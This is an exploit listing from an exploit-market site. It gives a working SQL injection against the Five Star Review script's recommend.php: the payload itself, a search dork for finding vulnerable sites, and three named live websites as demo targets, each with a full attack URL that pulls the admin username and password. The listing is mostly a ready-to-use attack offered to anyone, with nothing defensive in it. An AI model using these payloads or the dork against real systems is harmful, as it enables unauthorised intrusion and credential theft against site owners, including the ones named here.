[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Five Star Review v5.1 SQL Injection (recommend.php)

Author
EthicalPractice
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17243
Category
web applications
Date add
06-12-2011
Platform
php
################################################################################################


#  Exploit Title: Five Star Review Remote SQL Injection (recommend.php)

#  Script Page : http://www.review-script.com

#  Date: 5-12-2011

#  Version: Versions below v5.1

#  Author : EthicalPractice

#  Tested on: Firefox 8.0, Palemoon 8.0, Internet Explorer 9 - WINDOWS 7,
VISTA, XP

#  Note: This exploit works on the older versions ONLY.

#  Demo Sites:
http://www.txmud.com/review/recommend.php?item_id=-1+and+%28select%201%20from%28select+count%28*%29,concat%28%28select+concat%28username,0x3a,passtext%29%20from%20review_admin+limit+0,1%29,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables+group%20by%20a%29b%29
              http://www.sushimonsters.com/review/recommend.php?item_id=-153+and+%28select%201%20from%28select+count%28*%29,concat%28%28select+concat%28username,0x3a,passtext%29%20from%20review_admin+limit+0,1%29,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables+group%20by%20a%29b%29
              http://www.forextradingcoursereviews.com/review/recommend.php?item_id=-91+and+%28select%201%20from%28select+count%28*%29,concat%28%28select+concat%28username,0x3a,passtext%29%20from%20review_admin+limit+0,1%29,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables+group%20by%20a%29b%29
################################################################################################

## Injection Point : /recommend.php?item_id=[SQL]


## Dork: inurl:"/recommend.php?item_id="


## Exploit Code: +and+(select 1
from(select+count(*),concat((select+concat(username,0x3a,passtext) from
review_admin+limit+0,1),floor(rand(0)*2))a from
information_schema.tables+group by a)b)


## Example: /recommend.php?item_id=-1+and+(select 1
from(select+count(*),concat((select+concat(username,0x3a,passtext) from
review_admin+limit+0,1),floor(rand(0)*2))a from
information_schema.tables+group by a)b)


################################################################################################

#  Team Intra till I die.
#  Greets to thethatguy, Haxor, kaledori, Zelos, Mx., exc3llent, skynet,
m00dy, v3xr, Codine, Classy, VipVince, Dan, Prominent, Gringoire, hac



#  0day.today [2024-12-24]  #